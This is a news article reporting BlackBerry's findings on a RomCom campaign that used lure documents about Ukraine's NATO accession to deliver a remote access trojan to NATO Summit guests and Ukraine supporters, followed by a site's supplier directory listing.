RomCom Hackers Target NATO Summit

Uploaded on 2023-07-19 in FREE TO VIEW, TECHNOLOGY--Hackers

The Russian-linked threat actor RomCom has been targeting entities supporting Ukraine in a recently identified cyber operation. Researchers at Blackberry found two malicious documents submitted from an IP address in Hungary, sent as baits to an organisation supporting Ukraine abroad. The targets include guests of the 2023 NATO Summit, which took place July 11-12.

According to their analysis of the threat actor’s TTPs (tactics, techniques, and procedures), network infrastructure, and code similarity, the threat actor RomCom is behind the campaign. They have named the malware Romcom RAT.

This indicates that the threat actor is using fake documents pretending to attempt to lobby for Ukraine’s NATO accession and the probability of Ukraine becoming a member of the organisation in the future. The NATO Summit discussed the war in Ukraine, Ukraine’s NATO accession, and Sweden’s recently-announced membership.

RomCom created malicious documents and tested their delivery system on June 22. The documents rely on embedded RTF files and OLE objects to collect system information and deliver the RomCom remote access trojan.

Spear-phishing techniques will be used to distribute these documents to supporters of Ukraine. Also known as Void Rabisu and Tropical Scorpius, the hacking group was believed to be financially motivated. Recent shifts in operations and motivation indicate the group is likely working for the Russian government. 

RomCom has attacked targets in Ukraine, as well as European conferences, defense companies, and municipalities helping Ukrainian refugees.

Since at least October 2022, the threat actor’s RomCom backdoor has been used in attacks targeting Ukraine, including users of Ukraine’s Delta situational awareness program and organisations in Ukraine’s energy and water utility sectors.

Blackberry:  Ukraine World CongressBleeping Computer:  HackRead:    Oodaloop:   Security Week

Image: Danzig-Hamburg

You Might Also Read: 

New Russian Malware Targets Ukraine:

___________________________________________________________________________________________

If you like this website and use the comprehensive 6,500-plus service supplier Directory, you can get unrestricted access, including the exclusive in-depth Directors Report series, by signing up for a Premium Subscription.

  • Individual £5 per month or £50 per year. Sign Up
  • Multi-User, Corporate & Library Accounts Available on Request

Cyber Security Intelligence: Captured Organised & Accessible

 

« Details On How Revolut's Payment System Got Hacked
Chinese Spies Used Forged Validation Tokens To Access Government Emails »

CyberSecurity Jobsite
Perimeter 81
Cyrin

Real Attacks. Real Tools. Real Scenarios.
Schedule a demo

Go Cyber

Training that transforms behaviours

Sign Up: Cyber Security Intelligence Newsletter

Directory of Suppliers

Syxsense

Syxsense

Syxsense brings together endpoint management and security for greater efficiency and collaboration between IT management and security teams.

Alvacomm

Alvacomm

Alvacomm offers holistic VIP cybersecurity services, providing comprehensive protection against cyber threats. Our solutions include risk assessment, threat detection, incident response.

MIRACL

MIRACL

MIRACL provides the world’s only single step Multi-Factor Authentication (MFA) which can replace passwords on 100% of mobiles, desktops or even Smart TVs.

LockLizard

LockLizard

Locklizard provides PDF DRM software that protects PDF documents from unauthorized access and misuse. Share and sell documents securely - prevent document leakage, sharing and piracy.

Cyber Security Supplier Directory

Cyber Security Supplier Directory

Our Supplier Directory lists 6,000+ specialist cyber security service providers in 128 countries worldwide. IS YOUR ORGANISATION LISTED?

SecureNow Insurance Broker

SecureNow Insurance Broker

SecureNow is a commercial insurance broker based in India. Services offered include Cyber Risk insurance.

My Data Recovery Lab

My Data Recovery Lab

We recover data from: HDDs, RAIDs, NAS, SSDs, USB Flash Devices, Desktop Computers, Mobile devices and other data storage media.

Global Station for Big Data & Cybersecurity (GSB)

Global Station for Big Data & Cybersecurity (GSB)

GSB is an interdisciplinary research hub to cover big data, information networks, and cybersecurity.

Cradlepoint

Cradlepoint

With Cradlepoint customers leverage the speed and economics of wired and wireless Internet broadband for branch, mobile, and IoT networks while maintaining end-to-end visibility, security and control.

Mantix4

Mantix4

Mantix4’s M4 Cyber Threat Hunting Platform actively defends against cyber threats.

CICRA

CICRA

CICRA is Sri Lanka's pioneering cyber security training and consultancy provider.

CyberFortress

CyberFortress

CyberFortress is an insuretech startup offering a new kind of online business interruption policy designed for small business.

ioXt Alliance

ioXt Alliance

The ioXt Alliance is a group of manufacturers, industry alliances and government organizations dedicated to harmonizing best security practices in a highly connected world.

Cloud & Cyber Security Expo

Cloud & Cyber Security Expo

Cloud & Cyber Security Expo is the UK’s largest cloud and cyber security event.

Talon Cyber Security

Talon Cyber Security

Talon delivers the leading enterprise browser designed to bring security to managed and unmanaged devices, regardless of location, device type or operating system.

SessionGuardian

SessionGuardian

SessionGuardian (formerly SecureReview) is the world's first and only technology which ensures second-by-second biometric identity verification of your remote user, from log on to log off.

Solvo

Solvo

Solvo enables security teams and other stakeholders to automatically uncover, prioritize, mitigate and remediate cloud infrastructure access risks.

IDVerse

IDVerse

IDVerse is focused on making user verification effortless through technology. We build intelligent tools that protect users from identity fraud while enabling a seamless user experience.

Cyber Security Global

Cyber Security Global

Cyber Security Global is a leader in electronic security, consultancy, technology, cybersecurity solutions, training, and specialized products.

Icon Information Systems (ICONIS)

Icon Information Systems (ICONIS)

ICONIS is an integrated infrastructure and service provider, offering unified Information Technology (IT) solutions globally.

True Corporation

True Corporation

True Corporation is Thailand’s leading Telecom-Tech company, empowering people and businesses with connected solutions that advance society sustainably.